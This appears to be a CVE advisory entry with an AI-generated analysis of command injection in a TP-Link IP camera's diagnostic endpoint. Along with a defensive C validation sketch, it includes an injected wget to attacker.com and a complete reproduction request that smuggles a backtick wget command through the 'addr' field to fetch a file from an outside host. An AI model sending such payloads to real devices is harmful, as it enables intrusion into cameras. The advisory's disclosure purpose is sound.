CVE-2024-48288
Description
TP-Link TL-IPC42C V4.0_20211227_1.0.16 is vulnerable to command injection due to the lack of malicious code verification on both the frontend and backend.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability mechanics
Root cause
"The system fails to validate malicious code in user-supplied input for diagnostic commands."
Attack vector
An attacker with valid login credentials can exploit this vulnerability by sending a crafted HTTP POST request to the `/ds` endpoint. This request includes a JSON payload containing diagnostic commands like 'tracert' or 'ping'. The 'addr' parameter within the payload is not properly sanitized, allowing the injection of arbitrary commands, such as `wget http://attacker.com/malware` [ref_id=1]. The vulnerability requires access to the hidden `ConfSysSettingDiagnostic.htm` page, which can be accessed by modifying HTTP packets [ref_id=1].
Affected code
The vulnerability resides in the `sub_2D85A` function within the `dsd` binary file. Specifically, the `jso_obj_get_string_origin` function retrieves the 'addr' parameter from HTTP requests. This parameter is then concatenated into a string using `snprintf` and subsequently executed by the `system` function, leading to command injection [ref_id=1].
What the fix does
The patch does not show the specific code changes. However, the advisory indicates that the vulnerability is due to a lack of malicious code verification on both the frontend and backend. Remediation involves updating the firmware to a version that properly validates and sanitizes user inputs before executing diagnostic commands [ref_id=1].
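A minimal sketch of the backend validation this remediation calls for, added here as an example; it is not TP-Link's code and not taken from the `dsd` binary. The function names, the length limits and the `traceroute -m` invocation are assumptions.

```c
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Pattern described above (sketch, not the firmware's code):
 *   snprintf(cmd, sizeof cmd, "<tool> %s", addr); system(cmd);
 * The shell then interprets backticks, $(), ;, | inside addr. */

/* Allowlist: hostname / IPv4 / IPv6 literal characters only; no leading '-'. */
int addr_is_safe(const char *addr)
{
    size_t len = addr ? strlen(addr) : 0;
    if (len == 0 || len > 253 || addr[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':')
            return 0;
    }
    return 1;
}

/* hops must be 1-3 decimal digits (assumed limit). */
int hops_is_safe(const char *hops)
{
    size_t len = hops ? strlen(hops) : 0;
    return len >= 1 && len <= 3 && strspn(hops, "0123456789") == len;
}

/* Run with an argument vector and no shell, so addr is always a single
 * argv element. Returns the exit status, or -1 on rejected input or error.
 * "traceroute -m" is an assumed tool and option. */
int run_tracert(const char *addr, const char *hops)
{
    int status;
    if (!addr_is_safe(addr) || !hops_is_safe(hops))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execlp("traceroute", "traceroute", "-m", hops, addr, (char *)NULL);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The allowlist and the shell-free `exec` are independent layers: either one alone stops the `addr` value from the reproduction request from reaching a shell.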
Preconditions
- auth: Attacker must possess valid login credentials (stok).
- input: Attacker must be able to intercept and modify HTTP packets to access the hidden `ConfSysSettingDiagnostic.htm` page.
Reproduction
```
POST /stok=$your_stok_value_here/ds HTTP/1.1
Host: 192.168.2.229
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en; q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Origin: http://192.168.2.229
Connection: close
Referer: http://192.168.2.229/

{"diagnose":{"start":{"diag_type":"tracert","addr":"www.baidu.com`wget http://192.168.2.208:8000/aa`","hops":"20"}},"method":"do"}
```
[ref_id=1]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.